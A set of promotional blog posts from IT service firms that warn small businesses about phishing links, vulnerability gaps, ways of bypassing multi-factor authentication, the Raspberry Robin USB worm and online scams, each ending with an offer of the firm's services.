Received a Random Link? DO NOT CLICK ON IT!

If you ever receive random texts or emails from PayPal (or any other business, for that matter) telling you they suspended your account and now require you to authenticate your identity with an unknown link, then you should definitely think twice before clicking on that link. This is a common method that hackers use to break into accounts, especially those account holders that fall for this phishing scam. There is a better alternative to investigate this issue to see where it leads. It is important to access your account the way you normally would instead of clicking on that link.

If you were in this position, what would you do?

It is pretty safe to say that no one wants to fall for a phishing scam; but, at the same time, it can be very tempting to trust the message to make sure there is nothing wrong with your account.

The best approach is simple, but definitely not one that we would intuitively think to do.

Instead of clicking on the link provided in the text or email, open up a new web browser tab and login to the website, the same way you normally would in order to access your account. It does not matter the type of account you are trying to log into, whether it be your bank, your favorite online retailer, or any website that you have an account with. The practice of logging into the site directly, rather than using the link given, is simple and easy to do. It will also help keep you from being a victim of a phishing attack.

Let Us Help Your Team and Keep Them Safe

4 Corner IT can help you and your company choose the best tools and resources to keep everyone safe from security and phishing attacks. Our professionals can help build your business’ defenses and offer training to all members of your team, including how to identify potential threats and the best practices to keep safe from these attacks. For more information or to get started today, contact us at 954.474.2204.

Contact Us Today and Check Out Our Blog!

Enterprise Businesses and Vulnerabilities

businesses

It is no secret how vital cybersecurity is for all organizations today. Recent data has shown just how crucial visibility into your company’s infrastructure really is. Today, most businesses have IT solutions to assist with detecting and managing their information systems vulnerabilities. These vulnerabilities can range from a bug in a code that can allow hackers to gain access to a flaw in the update that might fix one vulnerability but cause another. Enterprises face viruses, malware, spam, and phishing schemes. With the number of options available, IT professionals must learn how to manage these vulnerabilities and the types of solutions that will best fit the company. 

Enterprise Vulnerabilities are Pretty Bad

Sevco Security recently released a report, The State of the Cybersecurity Attack Surface, that gathered data from over 500,000 IT companies. This report found that many of the assets that these businesses relied on were missing critical endpoint protections or lacking critical checkpoints.

Research showed that from the businesses that were interviewed, 12% of the companies lacked endpoint protection services while 5% lacked enterprise patch management. It was also found that 19% of Windows servers were also missing endpoint protections.

These companies also demonstrated assets that were recognized by the security control console and registered as installed on a device, even though that device is not checking back in. This is an issue that many organizations deal with as 3% of IT assets showed stale endpoint protections with 1% showing stale patch management. Because of this, issues are more difficult to find and resolve before creating problems because devices are supposedly checked out and approved.

IT professionals should conduct proper research on all the available vulnerability management tools to find the appropriate ones to use. It is essential to look for a tool that allows automated scanning, alerting, and tracking of vulnerabilities over time. The tracking helps ensure that these vulnerabilities are patched as soon as possible. Vulnerability management tools should be pretty easy to set up and begin functioning as soon as possible. 

The four critical criteria of vulnerability management, also known as VM, are network discovery, scanning, reporting and correlation, and asset prioritization. It is important to ensure that you have an IT department that will always maintain your company’s infrastructure. If needed, you can also outsource vulnerability management to another IT team that will assist in protecting your organization’s infrastructure.

We Can Help Prevent Your Business from Experiencing These Issues

At AE Technology Group, our remote monitoring and maintenance are created in order to identify and solve IT problems before they can interrupt business operations. For more information or to find out how we can assist your company, contact us today at (516) 536-5006.

Contact Us Today!

Hackers Are Discovering Cracks in Multi-Factor Authentication

Multi-factor authentication, or MFA, is an effective practice in preventing cyberthreats. Unfortunately, and not surprisingly at all, hackers have found a way around MFA. Continue reading to learn how hackers found defects in multi-factor authentication and how to keep you and your company protected.

Why is Multi-Factor Authentication so effective?

The most common method hackers use to gain access to accounts is through phishing scams where they convince users to voluntarily provide login information like passwords and usernames. Although not as common, hackers guess frequently used weak passwords and might be successful. Either way, the secondary credential required by MFA means there is another level of security which helps prevent hackers from accessing accounts and personal information.

How are hackers getting around Multi-Factor Authentication?

Microsoft informed users of the recent attacks that have shown it is possible for hackers to find alternate ways around multi-factor authentication protocols. Hackers do not necessarily break through MFA but they are able to bypass inputting credentials required by MFA.

The most common way of bypassing MFA is through the use of “adversary-in-the-middle” attacks. In this attack, hackers use a phishing scam in tandem with a proxy server between the victim and the service he or she is logging into. Hackers are then able to steal the user’s password and the session cookie. The user is able to gain access to his or her account and has no idea that he or she was just hacked. In reality, the hacker just received access to the user’s account.

Other methods that are used to work around Multi-Factor Authentication

There are other means that hackers use to bypass multi-factor authentication but it may take time and effort. If a particular system uses SMS messages or email codes and the hacker was able to obtain the user’s login credentials, then the hacker can gain access to the account without having to answer the secondary credential.

Hackers can also bypass MFA by using trojans to spy on users or to take control of certain devices used to authenticate a system. If the account’s login portal depends on something the user knows, such as a code, hackers can attempt to get in.

What is the best approach?

The best defense against hackers and other attacks is to educate people on how hackers work and the most appropriate and effective security solutions to incorporate. It is recommended to implement multi-factor authentication. It is also crucial to teach employees the importance of MFA and other security solutions.

AE Technology Group can help you and your organization implement the best security solutions on the market. We can also provide extensive training and testing for your team to be prepared to handle any and all phishing attacks. To learn more about how we can help your business, contact us today at (516) 536-5006.

The Raspberry Robin Worm

raspberry robin

Utilizing storage devices, such as USB drives, has been known to spread malware from one device to another. Recent analyses found an imminent threat, known as the Raspberry Robin worm, is currently developing. What is it and how can you keep yourself and your company safe from attacks?

What is Raspberry Robin?

Raspberry Robin is a worm that was initially discovered in Europe in September 2021 by cybersecurity intelligence analysts at Red Canary. It was found to primarily affect users of Windows-operating systems.

What exactly does Raspberry Robin do?

When an infected USB drive is inserted into a computer, the device will display an infected .LNK file. A msiexec process is then started through the command prompt. A .BAT file has two commands that can be executed. One command can manage various Windows features and the other command can configure Open Database Connectivity. The combination of the two will make the threat difficult to locate on the network as it remains hidden.

The Raspberry Robin infection process was found to escalate further where compromised QNAP NAS (Network-Attached Storage) devices are also affected. During this stage, the hacker is able to retrieve the victim’s user and device names, using HTTP requests, once the .LNK file is downloaded. From the infected QNAP device, the malware then utilizes a malicious DLL (Dynamic-Link Library) in order to gain access and take control over the entire system.

How does Raspberry Robin spread?

Although it is understood that Raspberry Robin spreads via compromised USB drives, it’s unclear how it spreads from device to device.

What are hackers looking for?

Unfortunately, like most malware that are in its initial stages of development, there is not much known about Raspberry Robin. More research is required to determine its spreadability and the intention hackers may have when creating this worm. Although it is currently unknown, it is suspected that hackers developed this attack with the intent to steal data and/or install additional viruses on infected devices.

The Final Takeaway

To keep yourself and your business safe from Raspberry Robin is to treat all USB devices with intense scrutiny. This includes eliminating inserting USB drives that do not belong to you or USB devices that might have been found lying around on the ground. It is important to remember that USB drives may not look suspicious from the outside but inside, it can be compromised. Always think twice before plugging in any unknown devices on your computers. 

AE Technology Group can help your organization keep itself protected from the various and growing threats out there, including this Raspberry Robin worm. Although we’re unable to physically stop your team from inserting potentially infected USB devices, we can provide further education, including the dangers of doing so, as well as training for employees. In addition, we will continuously track your network environment for possible threats. To learn more about how we can keep your business safe, please contact us at (516) 536-5006.

Understanding Scams: How to Protect Your Business 

While we try our hardest to ensure there are enough security measures to make it a safe place, the internet can still be a dangerous place. People fall victims to scams every day as scams continue to evolve and become smarter. Scammers can find their way into your email, texts, and ads easily by creating realistic links that you can easily believe are legitimate. Businesses are no strangers to having to deal with costly scams. Why are some people more likely to fall for scams than others, and how do you stop your employees from inadvertently engaging in scams and costing your company?

How Do Scams Continue to Survive?

Online scams are a million-dollar industry that affects individuals and organizations worldwide. As tech advances and the world becomes more connected, scammers continue to adapt, thrive, and succeed in the business of scamming people. Plenty of companies exist with the sole purpose of scamming, and it’s becoming more common as the costs of running these scams continue to decrease and become easier.

Scammers often operate in countries with little regulation and laws that prevent them from operating, making it challenging to locate those responsible for the scams. There are a lot of techniques, methods, and types of scams that they use to bypass security and pass as legitimate in a way that tricks everyday people into clicking on their links, answering their phone calls, or responding to emails.

People will likely fall for scams because scammers often target vulnerability and familiarity. It’s a numbers game where they send thousands of emails and only receive a small handful of responses, but it’s just enough. 

When scammers target businesses, they use familiar brands or even the name of someone within your organization to request sensitive information. If an employee is not prepared or educated on the risk of scams, especially if the scammer is friendly and appears legitimate, the employee may ignore the warning signs. They usually end up fulfilling the request giving the scammer the information they need to complete their scam.

How to Protect Your Business

Thousands of scam emails, texts, and ads make their rounds every day, and it’s becoming more likely that you and your employees will come across a scam at some point in your life. One of the most efficient ways to protect your business from scams is to ensure your employees are educated and informed on what to look for and steps to take if a scam makes its way through network security. Here are some essential tips to help you avoid falling victim to scams.

  • Always remain cautious with every email and text message you receive. If you are suspicious, verify the sender’s identity through other means of communication.
  • Look for some common signs of phishing, including unreasonable demands, suspicious attachments, spelling or grammatical errors, or if you don’t recognize the contact information.
  • Ensure you have security software installed to help filter out scam emails, and always keep your systems and software up to date.
  • Always have a backup of your data if a scam does make it through. Implement a backup and disaster recovery solution utilizing on-site data storage and off-site data centers.

Get started protecting your business today with a security solution from AE Technology Group. To get started, give us a call at (516) 536-5006.

Contact Us Today!